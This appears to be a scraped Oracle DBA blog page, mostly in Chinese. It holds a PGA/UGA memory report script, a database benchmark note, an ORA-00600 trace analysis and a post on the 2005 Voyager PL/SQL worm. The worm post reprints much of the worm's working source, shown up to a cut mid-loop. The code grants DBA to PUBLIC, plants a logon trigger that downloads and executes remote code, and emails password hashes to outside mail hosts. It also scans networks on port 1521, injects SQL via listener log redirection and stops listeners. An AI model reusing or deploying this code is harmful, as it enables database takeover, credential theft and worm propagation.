select ‘Startup Time: ‘||to_char(min(logon_time),’YYYY-MM-DD HH24:MI:SS’) from curpgauga;
select ‘Current Time: ‘||to_char(sysdate,’YYYY.MM.DD-HH24:MI:SS’) from dual;
select ‘Worst possible value of concurrent PGA + UGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
sum(value),
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     maxpgauga
group by sid,
serial#,
username,
logon_time
order by sum(value) desc;
set heading off
select ‘Worst possible total and average values of concurrent PGA + UGA memory usage:’ from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||trunc(count(*)/2)||’ sessions.’ from maxpgauga;
select ‘Approximate value of current PGA + UGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
sum(value),
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     curpgauga
group by sid,
serial#,
username,
logon_time
order by sum(value) desc;
set heading off
select ‘Current total and average values of concurrent PGA + UGA memory usage:’ from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||trunc(count(*)/2)||’ sessions.’ from curpgauga;
select ‘Maximum value of PGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
value,
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     maxpgauga
where    name like ‘session pga memory max%’
order by value desc, sid desc;
set heading off
select ‘Worst possible total and average values of concurrent PGA memory usage:’ from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||count(*)||’ sessions.’ from maxpgauga where name like ‘session pga memory max%’;
select ‘Maximum value of UGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
value,
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     maxpgauga
where    name like ‘session uga memory max%’
order by value desc, sid desc;
set heading off
select ‘Worst possible total and average values of concurrent UGA memory usage:’  from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||count(*)||’ sessions.’ from maxpgauga where name like ‘session uga memory max%’;
select ‘Current value of PGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
value,
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     curpgauga
where    name like ‘session pga memory%’
order by value desc, sid desc;
set heading off
select ‘Current total and average values of concurrent PGA memory usage:’ from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||count(*)||’ sessions.’ from curpgauga where name like ‘session pga memory%’;
select ‘Current value of UGA memory usage per session:’ from dual;
set heading on
select   trim(to_char(sid))||’,’||trim(to_char(serial#)) “SID AND SERIAL#”,
username “USERNAME OR PROGRAM”,
value,
to_char(logon_time,’YYYY-MM-DD HH24:MI:SS’) “SESSION START TIME”
from     curpgauga
where    name like ‘session uga memory%’
order by value desc, sid desc;
set heading off
select ‘Current total and average values of concurrent UGA memory usage:’ from dual;
select sum(value)||’ bytes (total) and ~’||trunc(avg(value))||’ bytes (average), for ~’||count(*)||’ sessions.’ from curpgauga where name like ‘session uga memory%’;
select ‘Current SGA structure sizings:’ from dual;
show sga
select ‘Some initialization parameter values at instance startup:’ from dual;
select trim(name)||’=’||value
from v$parameter
where name in (‘__shared_pool_size’,
‘large_pool_size’,
‘pga_aggregate_target’,
‘sga_target’,
‘shared_pool_size’,
‘sort_area_size’,
‘streams_pool_size’) order by name;
select ‘Current Time: ‘||TO_CHAR(sysdate,’YYYY.MM.DD-HH24:MI:SS’) from dual;
spool off
set feedback on;
set heading on;
set linesize 80;
set pagesize 14;
set verify on;
set echo on;

Oracle Memory Usage Report: PGA And UGA Memory Usage Per Session

 

Performance: PostgreSQL VS SQLSERVER

最近(2010 March) redhat公司release了一份对PostgreSQL和SQLSERVER的性能检测报告,使用相同的HP ProLiant DL370 G6(Intel Xeon W5580)主机,操作系统是Redhat Enterprise Linux 5:Windows Server 2008 Enterprise;PostgreSQL 部分参数进行了优化,包括checkpoint_timeout,effective_cache_size等,值得注意的是关掉了自动vacuum(autovacuum=false).测试结果是PostgreSQL略有优势,见图:

点击浏览性能报告.

ORA-00600 [4400][48]错误一例

5月26日某客户告警日志中出现的ORA-00600 [4400],[48]错误记录,并产生了trace文件:,

*** SERVICE NAME:(ETL) 2010-05-26 16:45:45.930
*** SESSION ID:(262.12024) 2010-05-26 16:45:45.930
*** 2010-05-26 16:45:45.930
ksedmp: internal or fatal error
ORA-00600: internal error code, arguments: [4400], [48], [], [], [], [], [], []
ORA-10387: parallel query server interrupt (normal)
----- Call Stack Trace -----
calling              call     entry                argument values in hex
location             type     point                (? means dubious value)
-------------------- -------- -------------------- ----------------------------
ksedst+001c          bl       ksedst1              0FFFFFFFF ? 000000020 ?
ksedmp+0290          bl       ksedst               1048DFFC0 ?
ksfdmp+0018          bl       03F5B014
kgeriv+0108          bl       _ptrgl
kgeasi+0118          bl       kgeriv               10496FEC8 ? 000000002 ?
                                                   700000010008000 ? 110000AD0 ?
                                                   110190290 ?
ktcddt+012c          bl       kgeasi               110190110 ? 110450040 ?
                                                   113000001130 ? 200000002 ?
                                                   100000001 ? 000000000 ?
                                                   000000030 ? 000000013 ?
ktcsod+0384          bl       ktcddt               0000003C0 ? 000000018 ?
                                                   1048D4808 ?
kssdch_stage+0758    bl       _ptrgl
....................................................
----- End of Call Stack Trace -----
******************* Dumping process map ****************
377144 : ora_p001_ETL
100000000      93710K  read/exec         oracle
1100007ef       2372K  read/write        oracle
9fffffff0000000        44K  read/exec         /usr/ccs/bin/usla64
9fffffff000b30a         0K  read/write        /usr/ccs/bin/usla64
900000000375880       484K  read/exec         /usr/lib/liblvm.a[shr_64.o]
9001000a0121ac8       135K  read/write        /usr/lib/liblvm.a[shr_64.o]
900000000426180        74K  read/exec         /usr/lib/libcfg.a[shr_64.o]
9001000a00f5ed0        26K  read/write        /usr/lib/libcfg.a[shr_64.o]
90000000034e280         2K  read/exec         /usr/lib/libcrypt.a[shr_64.o]
9001000a00d4760         0K  read/write        /usr/lib/libcrypt.a[shr_64.o]
90000000069a7b0         4K  read/exec         /usr/lib/libc.a[aio_64.o]
9001000a022a340         0K  read/write        /usr/lib/libc.a[aio_64.o]
90000000035f300        85K  read/exec         /usr/lib/libodm.a[shr_64.o]
9001000a00d5c08        35K  read/write        /usr/lib/libodm.a[shr_64.o]
9000000003ef080        83K  read/exec         /usr/lib/libperfstat.a[shr_64.o]
9001000a01d0818         9K  read/write        /usr/lib/libperfstat.a[shr_64.o]
900000000358000         0K  read/exec         /usr/lib/libdl.a[shr_64.o]
9001000a0219000         0K  read/write        /usr/lib/libdl.a[shr_64.o]
9000000007ff100      8588K  read/exec         /oracle/product/10.2.0/lib/libjox10.a[shr.o]
8001000a0000038       585K  read/write        /oracle/product/10.2.0/lib/libjox10.a[shr.o]
9000000004a0000       228K  read/exec         /usr/lib/libpthreads.a[shr_xpg5_64.o]
9001000a0144000       558K  read/write        /usr/lib/libpthreads.a[shr_xpg5_64.o]
900000000045500      2966K  read/exec         /usr/lib/libc.a[shr_64.o]
9001000a0000788       844K  read/write        /usr/lib/libc.a[shr_64.o]
   Total      110843K
******************* End of process map dump ****************
===================================================
PROCESS STATE
-------------
Process global information:
     process: 7000000cf48bf98, call: 7000000b40ebdf0, xact: 7000000cdece7a8, curses: 7000000cf666540, usrses: 7000000cf666540
  ----------------------------------------
  SO: 7000000cf48bf98, type: 2, owner: 0, flag: INIT/-/-/0x00
  (process) Oracle pid=43, calls cur/top: 7000000b40ebdf0/7000000b40ebdf0, flag: (0) -
            int error: 0, call error: 0, sess error: 0, txn error 0
  (post info) last post received: 115 0 4
              last post received-location: kslpsr
              last process to post me: 7000000cf479c38 1 6
              last post sent: 0 0 251
              last post sent-location: kxfpqr: QC
              last process posted by me: 7000000cf48a7f8 10 0
    (latch info) wait_event=0 bits=0
    Process Group: DEFAULT, pseudo proc: 7000000cf50bd50
    O/S info: user: oracle, term: UNKNOWN, ospid: 377144
    OSD pid info: Unix process pid: 377144, image: oracle@etl_a (P001)
   SO: 7000000cf666540, type: 4, owner: 7000000cf48bf98, flag: INIT/-/-/0x00
    (session) sid: 262 trans: 7000000cdece7a8, creator: 7000000cf48bf98, flag: (c0100041) USR/- BSY/-/-/DEL/-/-
              DID: 0001-0028-000FFB1E, short-term DID: 0001-002B-00151DA1
              txn branch: 7000000cdf412c8
              oct: 0, prv: 0, sql: 0, psql: 0, user: 26/ETL
    O/S info: user: bo, term: pts/0, ospid: 377144, machine: etl_a
              program: oracle@etl_a (P001)
    last wait for 'SQL*Net message from dblink' blocking sess=0x0 seq=45 wait_time=476 seconds since wait started=0
                driver id=0, #bytes=1, =0
    Dumping Session Wait History
     for 'SQL*Net message from dblink' count=1 wait_time=476
                driver id=0, #bytes=1, =0
     for 'SQL*Net message to dblink' count=1 wait_time=1
                driver id=0, #bytes=1, =0
     for 'log file sync' count=1 wait_time=7483
                buffer#=ca9, =0, =0
     for 'log file sync' count=1 wait_time=358
                buffer#=ca9, =0, =0
     for 'PX Deq: Execution Msg' count=1 wait_time=15527
                sleeptime/senderid=1001ffff, passes=1, =0
     for 'log file sync' count=1 wait_time=11855
                buffer#=c57, =0, =0
     for 'PX Deq: Execution Msg' count=1 wait_time=277142
                sleeptime/senderid=1001ffff, passes=1, =0
     for 'direct path write' count=1 wait_time=25
                file number=5, first dba=103ca, block cnt=3
     for 'direct path write' count=1 wait_time=6
                file number=4, first dba=1abe1, block cnt=8
     for 'row cache lock' count=1 wait_time=3307
                cache id=5, mode=0, request=5
    temporary object counter: 0
      ----------------------------------------
      Virtual Thread:
      kgskvt: 7000000c0e86b58, sess: 7000000cf666540, vc: 0, proc: 7000000cf48bf98
      consumer group cur: OTHER_GROUPS (upd? 0), mapped: DEFAULT_CONSUMER_GROUP, orig:
      vt_state: 0x200, vt_flags: 0x30, blkrun: 0
      is_assigned: 1, in_sched: 0 (0)
      vt_active: 0 (pending: 0)
      used quanta: 0 (cg: 0)
      cpu start time: 0, quantum status: 0x0
      quantum checks to skip: 0, check thresh: 0
      idle time: 0, active time: 0 (cg: 0)
      cpu yields: 0 (cg: 0), waits: 0 (cg: 0), wait time: 0 (cg: 0)
      queued time outs: 0, time: 0 (cur 0, cg 0)
      calls aborted: 0, num est exec limit hit: 0
      undo current: 0k max: 0k
      ----------------------------------------
      UOL used : 0 locks(used=0, free=2)
      KGX Atomic Operation Log 7000000bdcf0568
       Mutex 0(0, 0) idn 0 oper NONE
       Cursor Parent uid 262 efd 9 whr 11 slp 0
       oper=NONE pt1=7000000c69d0878 pt2=7000000bef37090 pt3=7000000b47119c8
       pt4=0 u41=1 stt=0
      KGX Atomic Operation Log 7000000bdcf05b0
       Mutex 7000000bdc2d028(0, 2) idn 0 oper NONE
       Cursor Stat uid 262 efd 12 whr 1 slp 0
       oper=NONE pt1=7000000bdc2cef8 pt2=0 pt3=0
       pt4=0 u41=0 stt=0
      KGX Atomic Operation Log 7000000bdcf05f8
       Mutex 0(0, 0) idn 0 oper NONE
       Library Cache uid 262 efd 0 whr 0 slp 0
      ----------------------------------------
      SO: 7000000cf7e3ec8, type: 5, owner: 7000000cf666540, flag: INIT/-/-/0x00
      (enqueue) DX-00000010-00000000	DID: 0001-002B-00151DA9
      lv: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  res_flag: 0x2
      res: 0x7000000cf8bd0b8, mode: X, lock_flag: 0x0
      own: 0x7000000cf666540, sess: 0x7000000cf666540, proc: 0x7000000cf48bf98, prv: 0x7000000cf8bd0c8

从trace文件名就可以看出出错的是某个并行子进程,其最近调用堆栈为ktcsod->ktcddt->kgeasi(报错),ktcsod与ktcddt均为Oracle中内核事务控制模块函数 (Kernel Transaction Control),又该并行子进程最近等待为”SQL*Net message from dblink”事件,共等待476s(wait_time=476 seconds)。trace显示该并行会话包含分布式事务锁:

      SO: 7000000cf7e3ec8, type: 5, owner: 7000000cf666540, flag: INIT/-/-/0x00
      (enqueue) DX-00000010-00000000	DID: 0001-002B-00151DA9
      lv: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  res_flag: 0x2
      res: 0x7000000cf8bd0b8, mode: X, lock_flag: 0x0
      own: 0x7000000cf666540, sess: 0x7000000cf666540, proc: 0x7000000cf48bf98, prv: 0x7000000cf8bd0c8

即DX(Distributed transaction entry)锁;可以猜测该并行会话在等待远程事务被清理,但等待超时,故报错。

查询metalink可以发现Bug 5223587与该错误一致,该Bug的特征为:
1. 出现ORA-600[4400],且调用栈为ktcddt ,说明涉及到了分布式事务
2. trace显示当时无打开的游标
3. 可以看到当时的等待为’SQL*Net message from dblink’事件
Metalink文档[ID  444108.1]描 述该错误会在涉及远程数据库的并行DML操作中出现,但该错误仅会在清理阶段出现,故实际无影响(It is not critical as such, since it is happening during the cleanup of the operation.)。

该Bug可以通过实施Patch 5223587修复, 目前该补丁只有对应基础版本10.2.0.2和10.2.0.3的版本,该补丁在 10.2.0.3 上有AIX power(64 bit)和Solaris Sparc(64 bit)的版本,10.2.0.2上只有linux-64 与HP-UX的版本。因为该Bug一般不会产生不良影响,故实际上不建议应用补丁。

Oracle Voyager Worm 一段匿名块SQL蠕虫

2005年12-20日(很久以前)一位匿名用户在邮件列表中发布了一段匿名块的SQL蠕虫病毒,这可能是人们第一次意识到PL/SQL也能用来写病毒。很多专家都对该段程序进行了分析,其主要破坏行为如下:

1.将DBA权限授予public角色

2.删除名为aa的trigger

3.创建名为aa的数据库登陆后(after database logon)触发器,该触发器还包含了使用UTL_TCP包(前提是病毒所在实例可能链接到外网)获取来自于http://www.google.de/search?hl=en&q=startc0GtJBi1+full-disclosure&btnI=I%27m+Feeling+Lucky的疑似病毒信息,google已经将该地址屏蔽了

4.通过smtp01.us.oracle.com邮件发送服务器发送标题为(Password hashes)包含数据库密码哈希值的邮件至 larry@oracle.com(可能是Oracle老总larry ellison 邮箱地址)

5.扫描实例所在主机子网中的所有ip,之后会尝试使用随机ip.修改listener.log,并且将”alter user mdsys identified by mdsys”添加至glogin.sql,每次使用SQLPLUS时均会执行该SQL.

6.创建可能的数据库连接(DBLINK),并尝试猜测密码组合,如(system/manager, sys/change_on_install, dbsnmp/dbsnmp, outln/outln, scott/tiger, mdsys/mdsys, ordcommon/ordcommon)等较为常见的组合。

7.尝试关闭listener

这是一种尝试,首先向我们证明了PL/SQL也具备编写病毒程序的能力;其次Oracle可能并不如我们想象的那么安全。

有兴趣可以瞻仰一下这段代码,oracle worm voyager.

--##s
tartc0GtJBi1
DECLARE

i1 INTEGER;
i2 INTEGER;
i6 INTEGER;

iHostToSearchFor INTEGER;

reference_ip varchar2(1000);
reference_url varchar2(1000);

starting_ipaddress varchar2(100);
current_ipaddress VARCHAR2(100);
current_network VARCHAR2(100);
current_letter VARCHAR2(1);

c   UTL_TCP.CONNECTION;
c1   UTL_TCP.CONNECTION;
ln integer;

vLen NUMBER;

PreviousSID varchar2(100);

vWorking varchar2(2500);
vWorking1 varchar2(2500);
vRequest varchar2(500);
vRequestStop varchar2(500);
vReqLog raw(500);
vRequestSQLCommand raw(32000);
vResp varchar2(32767);
vRespPiece varchar2(200);
vRespTemp varchar2(200);
ret_val pls_integer;
oraclehome varchar2(1000);
vRefresh varchar2(2000);
v_message      VARCHAR2(32000);

vRequestLogChange raw(10000);
vRequestLogReset raw(10000);

iLoop integer := 0;
iLength integer := 0;
cur binary_integer;

BEGIN

   BEGIN
      CTXSYS.DRILOAD.VALIDATE_STMT('GRANT DBA TO PUBLIC');
   EXCEPTION
      WHEN OTHERS THEN
         DBMS_OUTPUT.PUT_LINE('');
   END;

reference_ip := 'www.google.com';
reference_url := '/search?hl=en&q=startc0GtJBi1+full-disclosure&btnI=I%
27m+Feeling+Lucky';

vRefresh := 'declare req Utl_Http.Req;resp Utl_Http.Resp;v_msg varchar2(32767);af
varchar2(32767);ab varchar2(32767);ac varchar2(32767) := ''''' || reference_ip
|| ''''';v_url varchar2(32767) := ''''' || reference_url || ''''';ad varchar2
(32000) := ''''--##startc0GtJBi1'''';ae varchar2(32000) := ''''--##endc0GtJBi1'''';i3
INTEGER;i4 INTEGER;iLoop integer := 0;cur binary_integer;i binary_integer;begin
Utl_Http.Set_Proxy(proxy=>ac,no_proxy_domains=>ac );req := Utl_Http.Begin_Request
(url=>v_url,method=>''''GET'''' );utl_Http.Set_Header(r=>req,name=>''''User-
Agent'''',value=>''''Mozilla/4.0'''' );resp:=Utl_Http.Get_Response(r=>req);begin loop
Utl_Http.Read_Text(r=>resp,data=>v_msg);af:=af || v_msg;end loop;exception when
utl_Http.End_Of_Body then null;end;Utl_Http.End_Response(r=>resp);i3:=instr
(af,ad,1);i4:=instr(af,ae,i3);ab:=substr(af,i3+length(ad)+2,i4-(i3+length(ad)
+4));execute immediate ''''begin '''' || ab || '''' end;''''; end;';
vWorking := 'create or replace trigger aa AFTER LOGON ON DATABASE declare cur
binary_integer;BEGIN if round(dbms_random.value(1,100))=32 then EXECUTE IMMEDIATE '''
|| vRefresh || ''';end if;end;';

BEGIN
   EXECUTE IMMEDIATE 'drop trigger aa';
EXCEPTION
   WHEN OTHERS THEN
      DBMS_OUTPUT.PUT_LINE('the execute immediate didnt work');
END;

BEGIN
   EXECUTE IMMEDIATE vWorking;
EXCEPTION
   WHEN OTHERS THEN
      DBMS_OUTPUT.PUT_LINE('the execute immediate didnt work');
END;

starting_ipaddress := utl_inaddr.get_host_address;
current_ipaddress := starting_ipaddress;
ln := length(current_ipaddress);

loop
   current_letter := substr(current_ipaddress, ln, 1);
   ln := ln - 1;
   EXIT WHEN current_letter = '.';
   EXIT WHEN ln = 0;
end loop;

current_network := substr(current_ipaddress, 1, ln);

iHostToSearchFor := 1;

vRequest := chr(0) || chr(89) || chr(0) || chr(0) || chr(1) || chr(0) || chr(0) || chr
(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1) ||
chr(0) || chr(31) || chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=status))';

vRequestStop := chr(0) || chr(87) || chr(0) || chr(0) || chr(1) || chr(0) || chr(0) ||
chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1) ||
chr(0) || chr(29) || chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=stop))';

vReqLog := UTL_RAW.CONCAT( hextoraw('00'), hextoraw('A2'), utl_raw.cast_to_raw( chr(0)
|| chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(122) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1) ||
chr(0) || chr(104) || chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
(COMMAND=log_directory)(ARGUMENTS=)(SERVICE=)))'));

DECLARE
   a DBA_USERS.username%TYPE;
   b DBA_USERS.password%TYPE;

   CURSOR T1Cursor IS
      SELECT username, password
      FROM DBA_USERS;
BEGIN
   OPEN T1Cursor;
   LOOP
      FETCH T1Cursor INTO a, b;
      EXIT WHEN T1Cursor%NOTFOUND;
      v_message := v_message || a || ' ' ||  b || CHR(13) || CHR(10);
   END LOOP;
   CLOSE T1Cursor;
END;

loop
begin

   if MOD(iHostToSearchFor + 1, 100) = 0 then

      declare
         mailhost  CONSTANT VARCHAR2(30) := 'smtp01.us.oracle.com';
         crlf      CONSTANT VARCHAR2(2):= CHR(13) || CHR(10);
         mesg      VARCHAR2(32000);
         mail_conn utl_smtp.connection;

      BEGIN
          begin

           loop

            mail_conn := utl_smtp.open_connection(mailhost, 25);

            mesg := 'Date: ' || TO_CHAR( SYSDATE, 'dd Mon yy hh24:mi:ss' ) || crlf
|| 'From: oracle@' || starting_ipaddress || crlf || 'Subject: Password hashes' || crlf
|| 'To: larry at oracle.com' || crlf || '' || crlf || v_message;

            utl_smtp.helo(mail_conn, mailhost);
            utl_smtp.mail(mail_conn, 'oracle@' || starting_ipaddress);
            utl_smtp.rcpt(mail_conn, 'larry at oracle.com');
            utl_smtp.data(mail_conn, mesg);
            utl_smtp.quit(mail_conn);

            EXIT WHEN round(dbms_random.value(1, 20)) = 10;

           end loop;

         EXCEPTION
            WHEN OTHERS THEN
               DBMS_OUTPUT.PUT_LINE('');
         end;

         current_ipaddress := round(dbms_random.value(1, 254)) || '.' || round
(dbms_random.value(1, 254)) || '.' || round(dbms_random.value(1, 254)) || '.' || round
(dbms_random.value(1, 254));

         mail_conn := utl_smtp.open_connection(current_ipaddress, 25);

         mesg := 'Date: ' || TO_CHAR( SYSDATE, 'dd Mon yy hh24:mi:ss' ) || crlf
|| 'From: oracle@' || starting_ipaddress || crlf || 'Subject: Password hashes' || crlf
|| 'To: oracle@' || current_ipaddress || crlf || '' || crlf || v_message;

         utl_smtp.helo(mail_conn, current_ipaddress);
         utl_smtp.mail(mail_conn, 'oracle@' || starting_ipaddress);
         utl_smtp.rcpt(mail_conn, 'oracle@' || current_ipaddress);
         utl_smtp.data(mail_conn, mesg);
         utl_smtp.quit(mail_conn);

      EXCEPTION
         WHEN OTHERS THEN
            DBMS_OUTPUT.PUT_LINE('');

      end;

   end if;

   if iHostToSearchFor < 255 then

      current_ipaddress := current_network || '.' || iHostToSearchFor;

   else

      current_ipaddress := round( dbms_random.value(1, 254) ) || '.' || round(
dbms_random.value(1, 254) ) || '.' || round(dbms_random.value(1, 254)) || '.' || round
(dbms_random.value(1, 254));

   end if;

   iHostToSearchFor := iHostToSearchFor + 1;

   vResp := '';

   c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
   ret_val := UTL_TCP.WRITE_RAW(c, vReqLog);
   vLen := UTL_TCP.READ_RAW(c, vResp, 100 );

   vRespPiece := utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 13, 88));
   vResp := vRespPiece;

   declare
      read_from_network varchar2(32000);
      length_read_from_network INTEGER;
   begin
      loop
         read_from_network := '';
         length_read_from_network := UTL_TCP.READ_RAW(c, read_from_network, 100 );
         read_from_network := utl_raw.cast_to_varchar2(utl_raw.substr
(read_from_network, 1, length_read_from_network));
         vResp := vResp || read_from_network;
      end loop;

   EXCEPTION
     when OTHERS then
         read_from_network := '';
   end;

   UTL_TCP.CLOSE_CONNECTION(c);

   declare
      i5 INTEGER;
      i6 INTEGER;
      oraclehome varchar2(1000);
   begin

   i5 := 1;
   i6 := 1;

   i5 := instr(vResp, '(LOGDIRNAME=', 1);

   if i5 > 0 then

      i6 := instr(vResp, '\network\log', i5);
      if i6 = 0 then
         i6 := instr(vResp, '/network/log', i5);
      end if;

      oraclehome := substr( vResp, i5 + 12, i6 - (i5 + 12) );

   end if;

   iLength := length(oraclehome);

   vRequestLogChange := UTL_RAW.CONCAT( utl_raw.substr(
utl_raw.cast_from_binary_integer(218 + iLength), 3, 2 ), utl_raw.cast_to_raw( chr(0)
|| chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1)),
utl_raw.substr( utl_raw.cast_from_binary_integer(160 + iLength), 3, 2 ),
utl_raw.cast_to_raw( chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=135294976)(VALUE=' ||
oraclehome  || '/sqlplus/admin/glogin.sql)))'));

   vRequestLogReset := UTL_RAW.CONCAT( utl_raw.substr( utl_raw.cast_from_binary_integer
(218 + iLength), 3, 2 ), utl_raw.cast_to_raw( chr(0) || chr(0) || chr(1) || chr(0) ||
chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1)),
utl_raw.substr( utl_raw.cast_from_binary_integer(160 + iLength), 3, 2 ),
utl_raw.cast_to_raw( chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=135294976)(VALUE=' ||
oraclehome  || '/network/log/listener.log)))'));

   vWorking1 := 'alter user mdsys identified by mdsys;';

   iLength := length(vWorking1) + 1;

   vRequestSQLCommand := UTL_RAW.CONCAT( utl_raw.substr(
utl_raw.cast_from_binary_integer(58 + iLength), 3, 2 ), utl_raw.cast_to_raw( chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1)),
utl_raw.substr( utl_raw.cast_from_binary_integer(iLength), 3, 2 ), utl_raw.cast_to_raw
( chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(10) || vWorking1));

   c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
   ret_val := UTL_TCP.WRITE_RAW(c, vRequestLogChange);
   UTL_TCP.CLOSE_CONNECTION(c);

   c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
   ret_val := UTL_TCP.WRITE_RAW(c, vRequestSQLCommand);
   UTL_TCP.CLOSE_CONNECTION(c);

   c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
   ret_val := UTL_TCP.WRITE_RAW(c, vRequestLogReset);
   UTL_TCP.CLOSE_CONNECTION(c);

   end;

   c1  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);

   vResp := '';

   ret_val := UTL_TCP.WRITE_RAW(c1, utl_raw.cast_to_raw(vRequest));
   vLen := UTL_TCP.READ_RAW(c1, vResp, 100 );

   vRespPiece := utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 43, 58));
   vResp := vRespPiece;

   declare
      read_from_network varchar2(32000);
      length_read_from_network INTEGER;
   begin
      loop
         read_from_network := '';
         length_read_from_network := UTL_TCP.READ_RAW(c1, read_from_network, 100 );
         read_from_network := utl_raw.cast_to_varchar2(utl_raw.substr
(read_from_network, 1, length_read_from_network));
         vResp := vResp || read_from_network;
      end loop;

   EXCEPTION
      when OTHERS then
         read_from_network := '';
   end;

   UTL_TCP.CLOSE_CONNECTION(c1);

   declare
      i3 INTEGER;
      i4 INTEGER;
      sid varchar2(100);
      i binary_integer;
      procedure_to_spread varchar2(32000);
      create_link varchar2(500);
   begin

   i3 := 1;
   i4 := 1;

   loop

